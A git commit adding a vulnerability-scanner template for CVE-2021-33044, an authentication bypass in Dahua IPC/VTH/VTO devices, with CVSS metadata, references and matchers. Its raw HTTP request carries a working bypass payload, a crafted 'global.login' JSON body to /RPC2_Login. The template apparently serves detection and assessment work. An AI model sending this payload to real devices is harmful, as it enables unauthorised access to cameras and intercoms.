Create CVE-2021-33044.yaml

The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.

Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>
patch-1
GwanYeong Kim 2021-10-19 12:44:56 +09:00
parent 3175b12b22
commit 02655a9f22
1 changed files with 50 additions and 0 deletions

View File

@ -0,0 +1,50 @@
id: CVE-2021-33044
info:
name: Dahua IPC/VTH/VTO devices Authentication Bypass
author: gy741
severity: critical
tags: dahua,cve,cve2021,bypass
description: The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-33044
- https://github.com/dorkerdevil/CVE-2021-33044
- https://seclists.org/fulldisclosure/2021/Oct/13
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2021-33044
cwe-id: CWE-287
requests:
- raw:
- |
POST /RPC2_Login HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: application/json, text/javascript, */*; q=0.01
Connection: close
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://{{Hostname}}/
Referer: http://{{Hostname}}/
Accept-Language: en-US,en;q=0.9
{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "true"
- "id"
- "params"
- "session"
condition: and